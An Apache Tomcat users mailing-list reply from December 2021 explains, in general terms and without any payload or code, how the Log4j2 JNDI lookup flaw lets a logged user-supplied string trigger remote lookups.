On 13/12/2021 18:31, James H. H. Lampert wrote:
The thing I'm still utterly unclear about is how simply logging traffic
could, by itself, create a vulnerability.
In our case, the log entries are not even viewable unless you are signed
on to a command line session on the server (ssh for headless Linux; a
physical Twinax terminal, or a 5250 emulator of some sort, for IBM
Midrange).
How can a log entry be executed as a command, anyway?
Log4j2 supports a log message format syntax that includes JNDI lookups.
Log4j2 processes log messages repeatedly until it doesn't find any more
format strings. This means the output of one format string can insert a
new format string.
So, if the application is logging some user provided string verbatim
then the user can do the following:
- provide input that includes the log4j2 format string for a JNDI lookup
- on the first iteration log4j2 builds the log message that includes
the user provided string
- on the second iteration log4j processes the user provided format
string and performs a JNDI lookup
For an example of how a JNDI lookup can be leveraged to trigger code
execution in Tomcat see this article:
https://www.veracode.com/blog/research/exploiting-jndi-injections-java
That isn't the only way to use JNDI to trigger code execution and I am
sure security researchers will find a bunch of new ways as a result of
this vulnerability.
HTH,
Mark
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
